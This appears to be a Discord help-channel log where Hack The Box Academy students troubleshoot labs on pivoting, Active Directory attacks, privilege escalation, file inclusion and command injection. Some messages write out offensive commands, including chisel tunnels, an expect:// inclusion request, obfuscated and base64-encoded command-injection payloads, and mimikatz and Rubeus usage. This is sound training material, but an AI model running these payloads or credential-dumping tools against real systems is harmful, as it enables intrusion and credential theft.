True I’m gonna configure my vm correctly since it took 20 mins to load up internet explorer on it originally lol
also worth remembering that HTB has very explicitly designed the course so that the entire thing including the exam can be done exclusively from the browser based pwnbox
though anyone who does so is clearly insane, but still
like its a hard rule, sections dont get added to any module in the course unless you can complete the lab within the pwnbox
Ok gotcha, I will definitely remember that. Good to know the same for the exam
./chisel server -v -p 1234 --socks5 ./chisel client -v 10.129.202.64:1234 socks
your commands are also flipped for reverse proxy.
in a reverse proxy you host the server on your attacker host and connect from the client on the pivot
oh alright thanks
about the proxychains file if I use the command proxychains ping 172.x.x.x I should only configure the proxychains.conf file instead of the proxychains4.conf
ofc itll fail
ping uses ICMP
if you want ping you have to use a vpn styled proxy setup like ligolo-ng
proxychains/socks only does tcp and udp(poorly)
yes I tried using ligolo but unfortunately it was not connecting due to some reason
any idea why this is happening?
well its windows so it's backslash not forward slash for starters
your shell probably doesnt have error output and thus not seeing the failed to run results
ping also isn't terribly important, you should definitely learn both tools
I am using the powershell base64 from revshells do you have any other in mind to use for the purpose?
not really, you dont necessarily need it, im just saying its hiding information from you that may have been useful in troubleshooting
but the forward slash is the first problem to solve
.\ and ./ are NOT interchangeable on windows
forward slash is fine in powershell
sure? Out of habit I typed ./ last night in a lab and it errored on me
Also: did it transfer properly?
hmm, started up powershell on my work laptop and yeah, forward slash does work. Wonder why it wouldn't last night. oh well
might be in cmd that time
nah I never use cmd unless im forced to
The year is 1993, you have just installed Microsoft 3.1
Can someone assist me with this question, maybe I'm just confused but I'm having a lot of trouble:
Authenticate to 10.129.164.247 with user "damundsen" and password "SQL1234!"
Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.
The first question instructed me to RDP to the htb-user at 10.129.164.247 which I did no problem. Then this question's hint says to use mssqlclient.py which won't connect to the damundsen@10.129.164.247. I can RDP into damundsen@10.129.164.247 with the given credentials but not through mssqlclient.py.
Any tips?
Use sql from the context of the damundsen user
:p
172.16.5.150 is an internal host, you need to be on the internal network to access it
Right which is what I initially thought, but then the hint says to use mssqlclient.py which I assume to mean to do it from a Linux attack host no?
There's an internal linux host
Usually in this section there's a Linux attack host and a Windows attack host you can spawn, but in this question there's only a Windows attack host. So I guessed the only way to use mssqlclient.py would be from my own Linux attack host
The windows host is your initial vector: the linux host is also constant, it's stated in multiple sections of this module at the top what the credentials are and what host its on
Ah okay that makes sense, I thought the Linux host only was available in questions where it was explicitly mentioned
test
Your copy/paste is getting deleted by automod
so confused lmao
It's being seen as spam because it's a large block of text
so i cant copy output, cant copy pictures... great lmao
Read #welcome and you can find out how to do those things :)
It takes maybe, at most, 5 minutes
will do thx
@fathom pendant So since this question states: Authenticate to 10.129.164.247 with user "damundsen" and password "SQL1234!" it wants me to RDP into the host? I'm just trying to understand why add this blurb of information with that IP address and not the internal network address of 172.16.x.x
Reading the question carefully helps: it asks afterwards to leverage their sqladmin rights to access an internal host
You don't need mssql to complete this btw
Yeah I know, I was just trying to figure out how it expected us to use mssqlclient.py to do it that's what was confusing me. I understand everything else
I mean another method is pivoting
The module is assuming you remember/took notes on the internal Linux host to use
Took care of this, and answered my own question in the process ty
Yeah I remember the credentials for the linux host (they're the same as for the windows host) but usually you need to spawn the linux attack host to get the IP address that you can then SSH into. This question only provides the IP address of the Windows MS01 host
Yes
Because you can use windows to achieve the same thing
The section I believe goes over using some sql tools
Right which is what I ended up doing, but the hint telling me to use mssqlclient.py is what got me off track. Maybe the Linux host was also supposed to be spawned for this question idk
I don't have an IP address to SSH to, it didn't give me one and the linux host to SSH into changes every time it's spawned. I had to go back to a Linux centered question and spawn the Linux host. But really it's not that important, as you mentioned it's able to be done from the Windows host
... my brother in christ
The internal 172.x.x.x address that's provided in previous blurbs regarding that host is constant
172.16.5.225
It is spawned with the windows host
Actually if you're doing the "privileged access" section it's literally in the setup subheading
Ok that's my bad I wasn't clear enough, I knew the SSH access to the internal address is up and can be accessed via SSH from the MS01 host since it says that in the module. I meant usually when it expects us to SSH into that Linux attack host it provides us with the other subnet address of 10.x.x.x which we could SSH into. It's also my bad for not just SSH into the internal address, I just am used to using my VM to SSH into the Linux attack host directly and was focused on that more than just paying attention to a simple solution thats literally outlined in the text
Which is extra dumb on my part because I had this question yesterday and I just SSH into the internal address, got the other IP address and then connected to the 10.x.x.x address from my VM
Sorry, I get a bit obsessed with tiny details sometimes and miss the forest for the trees, gotta get better at looking at the big picture and not wasting all my time when there's a solution right in front of me
that's only on occasion: in this case - it's specifically stated: and yes that host does have a 10.x.x.x ip but likely due to backend reasons, they can't provide that to you
what's provided is the main target host
Yeah I understand
On the bright side, it forced me to get better at using PowerUpSQL which I hadn't used before as opposed to mssqlclient which I have used a lot
but it's not like it's hiding from you
just gotta sometimes remind yourself that there are limitations ¯\_(ツ)_/¯
Yeah I do this way too much just get zoned in on one thing and trying to understand why it's not the way I expect it to be lol character flaw of mine I guess
any idea how do I complete the task
Find cleartext credentials for another domain user. Submit the username as your answer.
in skill assessment ad enumeration?
sometimes tech just doesn't work the way you want it to; but it works
sounds like you don't have either PowerView loaded or ActiveDirectory loaded
I loaded powerview which gave me get object acl
But get domainforeignuser is not working
you don't need to use powerview for that
sounds like you're thinking in terms of AD settings. Try good old post exploitation credential hunting 🙂
Is anyone familiar with evilginx?
what academy module does this relate to?
this does not apply to the module, I just found out maybe someone uses it and can help
this channel is for discussion and help with academy modules
read #welcome to find out how to access more of the server and find a better place to ask your question
hello there, I'm struggling to find the password for the root user to access https://vc01.inlanefreight.local/ui/login, any hint would be great appreciate it...
Module : WinPrivEsc
Section: Further Credential Theft
what have you tried
basically all the commands explained into the section
but working with regedit HKEY_CURRENT_USER 2 users got my attention
but can't get the session info
not sure if I'm in the right way
Im losing my mind on Pillaging Module
Specifically the restic part: "Log in as Jeff via RDP and find the password for the restic backups. Submit the password as the answer."
Im logged in as Jeff and have gone through the module a dozen times
I have looked for RESTIC_PASSWORD in environmental variables - nada
tried running string searches as well throughout the box
What on earth am I missing, there has to be something obvious that I am not doing
LoL I need to review my sight, I found it
Someone help me with the question:+ 0 What is the path to the htb-student's mail?
I don't know if I understood it correctly but I have to find a file called mail or something like that
I figured it out, it was so stupid
Which module are you on?
I can look at my notes to assist, currently 94% done with this beast
System Information (Linux Fundamentals)
how?
you're looking for a directory, try the list of commands given at the start of the section
sorry, I dont have this one under my belt yet
So I use a command to find email, I mean ls?
you're not looking for an email, the question asked for the path to htb-student's mail, it's a path/directory
again use the list of commands given at the start of the section
hi, having issues on intro to malware analysis. I believe my issues are stemming from inetsim configuration. On the target vm when I go to a webpage using https I get the inetsim response, when using http I get a 405 error. I've tried changing the http port in the config and I still get 405 error. Any tips?
env
#Skills Assessment - Windows Fundamentals module
3. Creating a user called Jim
Uncheck: User must change password at logon
I think reading the question it's expected to do it from a GUI possibly ADUC but I cannot find it in the windows box because it's not installed/configured?
Anyone?
I don't have my notes for that module, but seems like you're on the right path using a GUI. Might want to find out if there are other methods to managing a user account.
Windows has a native way to do it without AD
I know I can add it via Users Account on Control Panel but the option of "Uncheck" is pointing me to ADUC because I haven't seen that option on a regular way of creating a new user acc
Yeah, you might want to learn about computer management
"Submit the contents of the flag.txt file on the Administrator desktop on MS01 "
Does MS01 represent an internal IP address on the target machine.
Try to find out
Use the methods from the pivoting module and combine them with the knowledge you gained from the AD Enum & Attacks
Does dynamic port forwarding not work here because I am connected to my target machine through a shell?
Hi, I'm working my way through Linux fundamentals and somewhat stuck on one of the questions, it asks - How many total packages are installed on the target system? I had tried "apt list --all-versions | wc -l" thinking it would list all the installed packages and count them, it gave me a result of 148675 but it seems it's incorrect. Does anyone have any other suggestions how to find the results I am after?
I have also tried "dpkg-query -l | wc -l " which gave me a different number
also incorrect
Don't do things on autopilot, think before you execute something
I encountered this issue as well. If I remember correctly, I had to use dpkg --list
tried this, it gave me the same count as dpkg-query -l
Could you show the output of dpkg-query -l | head? I'm wondering if there is some extra text in the beginning
there certainly is
same thing with the apt list command for installed
dpkg you need to filter for ii
(that's dpkg code for "Installed")
Get-DomainForeignGroupMember
This powerview command should give the members foreign to current domain right?
Im working on "Getting Started": Privilege escalation. I have ssh available. It doesnt make sense to have a reverse shell unless i can somehow get a shell as user2. Im assuming its looking for another way to escalate other than a reverse shell
this was exactly what i needed, found my result, thank you very much
user2 can see things it shouldn't
maybe a hidden directory in /root/ holds the key to move forward
Im still working to pivoting to user2
that's... super easy to do
Has anyone experienced RDP through Remmina being very slow? My session often has to reconnect every 30 seconds or so. I initially thought it was something with my VM, so I tried Pwnbox and got the issues there as well. Because of how slow it is, I can't move forward
look into how sudo works, if you know windows "runas" it's the same thing
try changing vpn regions
Find cleartext credentials for another domain user. Submit the username as your answer.
any advice on how to enumerate foreign members
So far I have tried using Get-DomainForeignMember and others in the image
Thank you that made it much better! :)
what makes you think it's a foreign domain user? they just ask for another domain user. it's got nothing to do with powerview, assuming you have admin on ms01, dump everything
Sudo -l shows that user 2 has no password for /bin/bash
I tried running sudo -u user2 bash -c 'echo "$(home/user2/flag.txt)"'
I get a permission denied return
Back to the drawing board
Hi, can someone help me? I'm stuck at Stack Based Buffer Overflows on Linux x86. I completed all the questions before but the final assessment breaks me. I'm writing the correct shellcode for a reverse shell outside of gdb but I keep getting a segmentation fault at an address I think I don't even update. I need some help...
Doh. It was even more simple than i thought
I can confirm that my shellcode is written in memory and I have set the address for the pointer to it, but I think the segmentation fault triggers before the pointer
haven't done that module, but a binary executed in gdb and a binary executed outside of gdb stores the environment variables differently which moves the addresses around. So your address from gdb may not be the same as when you execute it normally
Can i check using gdb if the pointer is even used?
I posted this command from the enable port forwarding pivot section with a few changes of course. and I looked up the internal ip by ipconfig on target machine
You can run the program with your shellcode in gdb and see if it works, and if it works in gdb but not outside then it’s likely the env variables
i get the same segmentation fault in gdb too. but when i look at the address where the fault is caused, its not part of my shellcode
Hello, I have a question about "php wrappers" in the "File inclusion" module. When I check the php.ini of the server, I see the lines "extension=expect" and "allow_url_include = On" which means that I can use either of the wrappers (data, input or expect). But when I do "curl -s "http://ip:port/index.php?language=expect://id" | grep uid" It doesn't work. I've checked with the data wrapper and it works just fine. Does anybody know why ?
does it even get to your shellcode is the question I guess. If you overwrite the buffer and put a incorrect jump address then a seg fault is likely to happen
I used the command
Rubeus.exe kerberoast to kerberoast all the users, got back 7 hashes, the only one I could crack was the one I had already used to access the machine
I tried to dcsync to dump the passwords
I did that on the admin ps
Thank you this seems promising. I got the return address by checking the memory where my pattern ends and the shellcode starts.
I'd say step through the code in gdb up until the jump happens and then check if the address is correct in memory (endianness and so on) and if the address is also actually where you want to jump
Anyone done the command injections module? I need some help with bypassing the last filter.
okay, how can I identify when the jump happens? In my opinion it should be the time when the segmentation fault happens but I can't see any jump instruction at this point.
In Footprinting Lab (hard), I understand that I'm supposed to use the SNMP server but the port is closed. I've tried the following with no luck
- resetting target
- terminating and starting the target
- changing VPN region
- using pwnbox
I forgot to find the correct community string, that may be it
edit: finding the community string helped
Since ssh isn't a port on windows... the dynamic port method is not going to work. Therefore , I need to try another pivot method
Command injection --> Bypassing Other Blacklisted Characters. Passed all the filters except the one that is filtering the cat command.
anyone a nudge?
does plink and "reverse port forward" help here?
do you need cat for that section?
Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found.
and the hint suggest using cat in a different way
sorry my bad
Bypassing Blacklisted Commands is it. one further
I've printed the printenv on the host to use the path to make the cat command but i dont get it working.
while its possible, you're usually wanting to use the env method to generate blocked symbols, like / or . or something
theres a lot easier way to bypass the 'cat', have another read through the blacklisted commands page
Hello, I have a question about "php wrappers" in the "File inclusion" module. When I check the php.ini of the server, I see the lines "extension=expect" and "allow_url_include = On" which means that I can use either of the wrappers (data, input or expect). But when I do "curl -s "http://ip:port/index.php?language=expect://id" | grep uid" It doesn't work. I've checked with the data wrapper and it works just fine. Does anybody know why ?
oh damn
got it
nice, well done
not sure why it doesn't work as supplied, but I've got it working by combining it with another technique it mentioned earlier in that section
Yeah i also got the flag but I was wondering why expect didn't work.
I tried 10 mins finding wordpress plugin in Attacking Common applications, when I just had to reformat words 🤦
IN AD Enumeration & Attacks - Skills Assessment Part II
- Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host
I tried Lazagne&Rubeus but no output, tried mimikatz - and it gives me an infinite loop for some reason.
tried crackmapexec smb but it gives an error.
How am I supposed to get other users?
hi
Hello, I'm a newb. That being said, I'm seeking any advice on the 'service enumeration' section of the 'network enumeration with nmap' module. So far I've tried the suggested scans multiple times, yet the scans take so much time my time in the pwnbox runs out. I've even added time to it. I wonder if maybe my personal connection speeds are lacking. Should I try scanning the target from my own vm? Thank you in advance.
if you are trying from a local attack machine you will face long delays specially if they are full noisy scans
I would suggest for this module use the browser vm HTB provides
Ok
Have you tried mimikatz as a one liner? mimikatz "privilege::debug" exit
tried but without the exit.. I'll try now..
module: PASSWORD ATTACKS, table of contents: Pass the Hash (PtH), q: 2nd last, read the flag in C:\julio\flag.txt. Well, the PS payload is executing on the DC but I am not getting the NC shell, need help, it's been a long time since I've been stuck here
Working on question four for this module and I'm stuck- https://academy.hackthebox.com/module/112/section/1069. I've run dnsenum and the bash example and checked for internal zone transfer with dig but none of those results are turning up a host ending in .203. Even used the top 1 million subdomains list from seclists and ran until it timed out (~2 hours). What am I missing? It feels like I need to do more with the internal zone transfer but I'm not sure what.
Commands I've tried: dnsenum --dnsserver <targethost> --enum -p 0 -s 0 -o subdomains.txt -f /home/subdomains-top1million-110000.txt inlanefreight.htb
for sub in $(cat /home/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @<targethost> | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done ^^This one was super slow and abandoned it after 45 minutes, dnsenum ran much faster
dig axfr internal.inlanefreight.htb <targethost>
for dnsenum I also tried using shubs-subdomains.txt and subdomains-top1million-5000.txt and bitquark-subdomains-top100000.txt from seclists but none of them turned anything up.
You should try the fierce wordlist
Broken Authentication: Predictable Reset Token: Question 1. Having trouble getting this one. I'm not sure if I have the python script correct. If anyone is willing to give a second pair of eyes to it I would appreciate the help. Thank you in advance
||Ran it, returned 2 hosts: app.inlanefreight.htb. 604800 IN A 10.129.18.15 ns.inlanefreight.htb. 604800 IN A 127.0.0.1||
under att n defense ->PKI - ESC1
Connect to the Kali host first, then RDP to WS001 as 'bob:Slavi123' and practice the techniques shown in this section. What is the flag value located at \dc1\c$\scripts?
I'm supposed to save the cert from where it starts (-----start certificate ----) to end certificate into a text file as cert.pem, right? But then when I try to run this:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
I am not able to read the cert.pem file
what was your command?
use dnsenum to bruteforce the hostnames
hey mate, mind if I ping you about this? I am at about 15 versions of my script, and apparently still missing some detail 😄
make sure to use the correct timezone and format for the string, if you can't figure it out, dm what you've got
Hey guys, I searched a bit on Google and the academy, but I'm just wondering if hackthebox has a C2 framework module.
not at the moment
$ dnsenum --dnsserver <targethost> --enum -p 0 -s 0 -o subdomains.txt -f /home/<myhost>/fierce-hostlist.txt inlanefreight.htb
@rustic sage too
Command injection --> obfuscation
Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
Whenever I try the find injection with obfuscated text, I get the pwd listed. Whenever I encode the find injection with base64 it gives me only the ping results. What is correct?
||%0af'i'nd%0a${PATH:0:1}usr${PATH:0:1}share%0a<<<%0agr"e"p%0aroot%0a<<<%0agr"e"p%0amysql%0a<<<%0ata'i'l%0a-n%0a1||
||%0aZmluZA==%0a${PATH:0:1}usr${PATH:0:1}share||
if you haven't got it, again dump ms01. what sensitive data can you access once you've gotten admin on a machine?
DM'd
Bummer. I don't know anything about c2 framework. Is there no module on it because it's not open source?
w
there are a number of good open source c2, just that there isn't a red team path at the moment
I see, thank you for your time Xre0uS. I'll do some more research, just thought I'd try hackthebox first
if you're just starting out there isn't really a need for a c2 btw
did you get it ?
https://academy.hackthebox.com/module/158/section/1437
The Ubuntu machine has a libc6 dependency issue for the latest git pull of chisel. However, chisel 1.7.2 seems to work fine.
encode in b64
%0abash%0a(base64%0a-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)
Anyone have a hint about what I am doing wrong? Only the ping results are shown.
that’s because the command is wrong